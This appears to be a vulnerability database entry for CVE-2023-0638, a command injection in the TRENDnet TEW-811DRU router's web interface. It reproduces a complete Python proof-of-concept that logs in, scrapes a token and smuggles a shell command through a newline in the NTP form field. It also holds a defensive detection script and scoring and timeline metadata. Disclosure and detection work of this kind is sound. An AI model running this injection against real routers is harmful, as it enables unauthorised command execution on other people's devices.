| CVSS Meta Temp Score | Current Exploit Price (≈) | CTI Interest Score |
|---|---|---|
| 6.5 | $0-$5k | 0.00 |

A vulnerability has been found in TRENDnet TEW-811DRU 1.0.10.0 and classified as critical. This vulnerability affects an unknown functionality of the component Web Interface. The manipulation with an unknown input leads to a command injection vulnerability. The CWE definition for the vulnerability is CWE-77. The software constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. As an impact it is known to affect confidentiality, integrity, and availability.
The weakness was presented on 02/02/2023. This vulnerability was named CVE-2023-0638. Technical details are unknown, but a public exploit is available. This vulnerability is assigned to T1202 by the MITRE ATT&CK project.
A public exploit has been developed in Python. It is possible to download the exploit at vuldb.com. It is declared as proof-of-concept. The code used by the exploit is:
```python
import requests,socket
import re
import time
from urllib.parse import urlencode

username = 'admin'
password = 'ZYWN7T47'
device_web_ip = '192.168.10.1'
ping_target_ip = '192.168.10.102'

request = {'HEAD':
               {'Host': '{}'.format(device_web_ip),
                'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
                'Accept-Language': 'en-US,en;q=0.5',
                'Accept-Encoding': 'gzip, deflate',
                'Content-Type': 'application/x-www-form-urlencoded',
                'Content-Length': '555',
                'Origin': 'http://0.0.0.0:8081',
                #'Authorization': 'Basic YWRtaW46WllXTjdUNDc=',
                'Connection': 'keep-alive',
                'Referer': 'http://0.0.0.0:8081/adm/time.asp',
                'Cookie': 'expandable=5c',
                'Upgrade-Insecure-Requests': '1'},
           'PARAM': {'token': 'fW092VEZZPulJJfC1WkY',
                     'DSTenable': 'on',
                     'NtpDstEnable': 1,
                     'NtpDstOffset': -7200,
                     'NtpDstStart': 'abcd\nping -c 1 {}\n'.format(ping_target_ip),
                     'tz_daylight_start_day_select': 1,
                     'tz_daylight_start_time_select': 2,
                     'NtpDstEnd': 100102,
                     'tz_daylight_end_month_select': 384968387,
                     'tz_daylight_end_day_select': 1,
                     'tz_daylight_end_time_select': 2,
                     'enableNTP': 1,
                     'ntp_server': 1,
                     'NTPServerIP': 'pool.ntp.org',
                     'time_zone': 'UCT_-11',
                     'timer_interval': 16776915,
                     'manual_year_select': 2012,
                     'manual_month_select': 'abcd',
                     'manual_day_select': 'abcd',
                     'manual_min_select': -38,
                     'manual_sec_select': "abcd",
                     'timeTag': 'dummy',
                     'range.func': '/.../.../.../.../.../.../.../.../.../.../',
                     'DNSServerGuest': ''},
           'ATTR':
               {'URL': 'http://{}/setNTP.cgi'.format(device_web_ip),
                'METHOD': 'POST',
                'VERSION': 'HTTP/1.1'}
           }

headers = request['HEAD']
params = request['PARAM']
method = request['ATTR']['METHOD']
url = request['ATTR']['URL']

login_header = {'Host': '0.0.0.0:8081',
                'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
                'Accept': '*/*',
                'Accept-Language': 'en-US,en;q=0.5',
                'Accept-Encoding': 'gzip, deflate',
                'Connection': 'keep-alive',
                'Referer': 'http://0.0.0.0:8081/login.asp',
                'Cookie': 'expandable=4c'}
login = 'http://{}/login.cgi?langSelection=EN'.format(device_web_ip)
probe = 'http://{}/wizard/wizard.asp'.format(device_web_ip)

loop = 3
r = None
while loop>0:
    try:
        loop -= 1
        r = requests.get(url=login,headers=login_header,auth=(username,password),timeout=5)
        if r.status_code != 200:
            continue
        r = requests.get(url=probe,headers=headers,auth=(username,password),timeout=5)
        pat = r'name="token" value="(.*?)"'
        token_value = re.findall(pat,r.text)
        if len(token_value)>0:
            params['token'] = token_value[0]
            print('new_token:{}'.format(token_value[0]))
            break
    except Exception as e:
        time.sleep((3-loop)*3)
        print('error:{}'.format(e))

try:
    r = requests.request(method=method,url=url,headers=headers,auth=(username,password),data=urlencode(params),verify=False,timeout=5)
except:
    pass
```

No information about possible countermeasures is known. It may be suggested to replace the affected object with an alternative product.
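A detection-side check for the request shape the proof-of-concept above uses, as an added example that is not part of the VulDB entry or the exploit: it decodes a form-encoded POST body sent to `/setNTP.cgi` and reports the fields whose values contain shell metacharacters. The function name, the metacharacter list and the sample requests are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl

# Characters that let a value break out of a shell command line (CWE-77):
# line breaks, command separators, pipes, backticks and $-substitution.
# The list is an assumption for this example, not taken from the firmware.
SHELL_META = re.compile(r"[\r\n;|&`]|\$[({]")

# Endpoint named in the PoC on this page; only the path is compared.
WATCHED_PATH = "/setNTP.cgi"


def suspicious_fields(method, path, body):
    """Return the sorted names of form fields whose decoded value
    contains a shell metacharacter; empty list if nothing matches."""
    if method.upper() != "POST" or path.split("?", 1)[0] != WATCHED_PATH:
        return []
    # parse_qsl percent-decodes values, so %0A becomes a real newline.
    fields = parse_qsl(body, keep_blank_values=True)
    return sorted({name for name, value in fields if SHELL_META.search(value)})


# Constructed sample requests (method, path, url-encoded body);
# these are not captured traffic.
SAMPLES = [
    ("POST", "/setNTP.cgi",
     "token=x&enableNTP=1&NTPServerIP=pool.ntp.org&NtpDstStart=030102&time_zone=UCT_-11"),
    ("POST", "/setNTP.cgi",
     "token=x&NtpDstStart=abcd%0Aping+-c+1+192.0.2.10%0A&NTPServerIP=pool.ntp.org"),
    ("GET", "/adm/time.asp", ""),
]

if __name__ == "__main__":
    for method, path, body in SAMPLES:
        hits = suspicious_fields(method, path, body)
        print(method, path, "ALERT " + ",".join(hits) if hits else "ok")
```

The same test can be applied to proxy or web-server logs that record POST bodies for the device's management interface.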
Product
License: commercial
CVSSv3
VulDB Meta Base Score: 7.2
VulDB Meta Temp Score: 6.5
VulDB Base Score: 7.2
VulDB Temp Score: 6.5
Exploiting
Class: Command injection
CWE: CWE-77 / CWE-74 / CWE-707
ATT&CK: T1202
Local: No
Remote: Yes
Access: Public
Status: Proof-of-Concept
Countermeasures
Recommended: no mitigation known
Timeline
02/02/2023 Advisory disclosed
02/02/2023 CVE reserved
02/02/2023 VulDB entry created
03/01/2023 VulDB last update
Sources
Advisory: vuldb.com
Status: Not defined
CVE: CVE-2023-0638
scip Labs: https://www.scip.ch/en/?labs.20161013
Entry
Created: 02/02/2023 09:09
Updated: 03/01/2023 16:39
Changes: 02/02/2023 09:09 (38), 02/02/2023 09:10 (2), 03/01/2023 16:39 (3)
Submitter: leetsun
